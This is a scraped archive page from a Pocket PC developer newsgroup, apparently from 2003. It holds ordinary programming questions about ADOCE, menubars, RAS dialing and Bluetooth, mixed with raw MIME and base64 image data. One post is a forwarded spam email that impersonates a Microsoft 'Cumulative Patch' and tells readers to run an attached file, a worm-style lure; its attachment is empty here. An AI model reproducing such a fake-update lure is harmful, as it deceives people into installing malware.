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 --quniohtanxj Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <qegusxo> R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St 3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7 zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza BxcFCjgwgQSJCQcWCggIADs= --quniohtanxj-- --lpnlnlwqzk Content-Type: application/x-compressed; name="qtifw.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment --lpnlnlwqzk-- Tag: Constants used with the INF file. Tag: 65485
      • 22
        • Creating ADOCE Objects with JScript Hello everyone I would like to have access to a database in my pocket PC via an html page (wich also is located on the same Pocket PC). I have written the following simple page that tries to create an ADOCE.Connection.3.0 (or 3.1) object, to show the problem I get: <html> <head> <title></title> <script language="JScript"> function OpenDB() { var con; alert('inside the function'); con = new ActiveXObject('ADOCE.Connection.3.1'); } </script> </head> <body> <input type="button" onClick="OpenDB();"> </body> </html> When I load this page in the web Browser of my pocket PC and Press the button displayed, the onClick event fires (I can see the messagebox with the text 'Inside the function'. Then I press OK and the webbrowser tries to create the ADOCE connection object, but it displays the following error : " Microsoft JScript runtime error Line: 6 character:1 Error: Automation server cannot create the object " The odd thing is that I have a similar code writen with eVB 3.0 and it works just fine. The same happens if I try to create a ADOCE recordset object or a filesystem object. Maybe there is some kind of registry setting I have to set to allow automation objects to be created Any ideas as to how to solve this? I have MS Pocket PC 3.0 installed on my fujitsu Pocket Loox device. Thank you in advance for any reply Antonio Miguel Tag: Constants used with the INF file. Tag: 65483
      • 23
        • Toolkit visual basic to evb3 i have a project with visual basic toolkit for vb6 now i use the same project with evb 3.0 after its installation with new tools of the program .vb on pocket pc I have noticed that is much slowest one than that one realized with toolkit for vb6 Cordiali saluti Luigi Galdi Tag: Constants used with the INF file. Tag: 65482
      • 24
        • menubar wierdness Hi all, Ive got a slightly strange problem with a dynamically created menubar. I use a minimal menu from the resource file, and create it using SHCreateMenuBar, and then use the following code to add a couple more menus to the bar: HMENU hMenu1 = CreatePopupMenu(); AppendMenu(hMenu1, MF_ENABLED | MF_STRING, 1001, TEXT("1one")); AppendMenu(hMenu1, MF_ENABLED | MF_STRING, 1002, TEXT("1two")); AppendMenu(hMenu1, MF_ENABLED | MF_STRING, 1003, TEXT("1three")); HMENU hMenu2 = CreatePopupMenu(); AppendMenu(hMenu2, MF_ENABLED | MF_STRING, 1004, TEXT("2one")); AppendMenu(hMenu2, MF_ENABLED | MF_STRING, 1005, TEXT("2two")); AppendMenu(hMenu2, MF_ENABLED | MF_STRING, 1006, TEXT("2three")); PTBBUTTON tbb1 = new TBBUTTON; PTBBUTTON tbb2 = new TBBUTTON; tbb1->iBitmap = I_IMAGENONE; tbb1->fsState = TBSTATE_ENABLED; tbb1->fsStyle = TBSTYLE_DROPDOWN |0x0080| TBSTYLE_AUTOSIZE; tbb1->iString = (int)(TEXT("ONE")); tbb1->dwData = (DWORD)(hMenu1); tbb2->iBitmap = I_IMAGENONE; tbb2->fsState = TBSTATE_ENABLED; tbb2->fsStyle = TBSTYLE_DROPDOWN |0x0080| TBSTYLE_AUTOSIZE; tbb2->iString = (int)(TEXT("TWO")); tbb2->dwData = (DWORD)(hMenu2); ::SendMessage(hMenuBar, TB_INSERTBUTTON, 0, (LPARAM)tbb1); ::SendMessage(hMenuBar, TB_INSERTBUTTON, 0, (LPARAM)tbb2); BUT both menu "ONE" and menu "TWO" display the same popup menu (2one, 2two, 2three). Anyone got any ideas what I am doing wrong? TIA Mark Tag: Constants used with the INF file. Tag: 65481
      • 25
        • Help needed on RAS Hi Below is the code snippet I have written for PocketPC device to connect to the RAS services in Win NT/2000. This code is working perfectly in PPC 2000/2002 devices. Recently, I ported this code to PPC2003 and compiled it using eVC4.0. I test the code using the HP2210 device but it does not work properly. I tried many times connecting to the RAS services but not every attempt is successful. The error value return from RasDial() function is 619. I have never encountered this problem using PPC2000/2003 devices. Do anyone have any ideas how to solve this problem? Thanks in advance. Tham ... ... memset(&recRASDialParams, 0, sizeof(RASDIALPARAMS)); recRASDialParams.dwSize = sizeof(RASDIALPARAMS); _tcscpy(recRASDialParams.szEntryName, _T("`115200 Default")); _tcscpy(recRASDialParams.szPhoneNumber, _T("")); _tcscpy(recRASDialParams.szCallbackNumber, _T("")); _tcscpy(recRASDialParams.szUserName, _T("user1")); _tcscpy(recRASDialParams.szPassword, _T("user123")); _tcscpy(recRASDialParams.szDomain, _T("")); // Dial to the RAS dwRes = RasDial(NULL, NULL, &recRASDialParams, 0xFFFFFFFF, NULL, &hrasconn); if( dwRes != 0 ) { // error dial to RAS server // dwRes is 619 (Port Disconnected) } else { // connected to RAS server } if( hrasconn ) { RasHangUp(hrasconn); while (!RasGetConnectStatus(hrasconn, &recRASConnStatus)) { ::Sleep(0); } hrasconn = NULL; } ... ... Tag: Constants used with the INF file. Tag: 65477
    • Next
      • 1
        • Bluetooth serial CRASH! Hi everybody, I wrote a program to connect a serial port Bluetooth device and it worked perfectly on PocketPC 2002 reading data on COM8 (or other ports). Now on the IPAQ 2210 with Windows Mobile 2003, it crashes and also the PDA turns off! I also tested the connection with Zterm and also Zterm makes the same. My question is : how to read data from the Bluetooth serial port on Windows Mobile 2003? Thanks for help! Claudio Tag: Constants used with the INF file. Tag: 65476
      • 2
        • registry key Hello, How to create a new registry key in the pocket pc registry using vb.net Thanks. Tag: Constants used with the INF file. Tag: 65474
      • 3
        • How to detect the full path to a SD memory card? Using FindFirstFlashCard also finds the flash file stores which are available on Compaq and Toshiba devices. Under Pocket PC 2002 it was not possible to open the flash store as a volume and therefore this method could be used to detect it. But under Pocket PC 2003, the trick does not work any longer. There i can open all devices as volumes. The 2003 functions FindFirstStore and FindNextStore work but the fields dwDeviceType and dwAttributes are always 0 and do not report the correct information while deviceName, storeName ... are reportet correctly! Any ideas! ... Helmut Tag: Constants used with the INF file. Tag: 65472
      • 4
        • active x and pocket pc do you know if i can use an active x to connect to a pocket pc . Does active x have support for sockets or active sync ? If yes could you show me which classes , methods,interfaces to use or even give me some sample code ? Thanks Tag: Constants used with the INF file. Tag: 65471
      • 5
        • FWD: Prove this internet update for Microsoft Windows --jvplxvinz Content-Type: multipart/related; boundary="lapezaajh"; type="multipart/alternative" --lapezaajh Content-Type: multipart/alternative; boundary="xsitxrlcdz" --xsitxrlcdz Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Customer this is the latest version of security update, the "October 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run executable on your system. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. ---------------------------------------------- The names of the actual companies and products mentioned = herein are the trademarks of their respective owners. Copyright 2003 Microsoft Corporation. --xsitxrlcdz Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp; <FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </B></I></FONT> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP> <FONT color=3D"#ffffff" size=3D1>&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>&nbsp; </FONT> </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <FONT FACE=3D"Verdana, Arial" SIZE=3D1><B> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>&nbsp;&nbsp;</B> </FONT> </TD> </TR> </TABLE> &nbsp;<IMG SRC=3D"cid:swcecej" BORDER=3D"0"><BR><BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Customer<BR><BR> this is the latest version of security update, the "October 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run executable on your system. This update includes the functionality = of all previously released patches. </FONT></TD></TR> </TABLE> <BR><BR> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:asoqqmm" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B> </FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:asoqqmm" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B> </FONT></TD><TD NOWRAP> <FONT SIZE=3D"1"> MS Internet Explorer, version 4.01 and later<BR> MS Outlook, version 8.00 and later<BR> MS Outlook Express, version 4.01 and later </FONT> </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:asoqqmm" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch = at the earliest opportunity.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:asoqqmm" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Run attached file. = Choose Yes on displayed dialog box.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:asoqqmm" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">You don't need to do = anything after installing this item.</FONT></TD> </TR> </TABLE> <BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> <BR><BR> Thank you for using Microsoft products.<BR><BR></FONT> <FONT SIZE=3D"1">Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies.<BR></FONT> <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> <FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners.</FONT> </TD></TR></TABLE> <BR> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </FONT></B> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"> &copy;2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A> &nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A>&nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> --xsitxrlcdz-- --lapezaajh Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <swcecej> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r 9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV 606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg 4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD 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 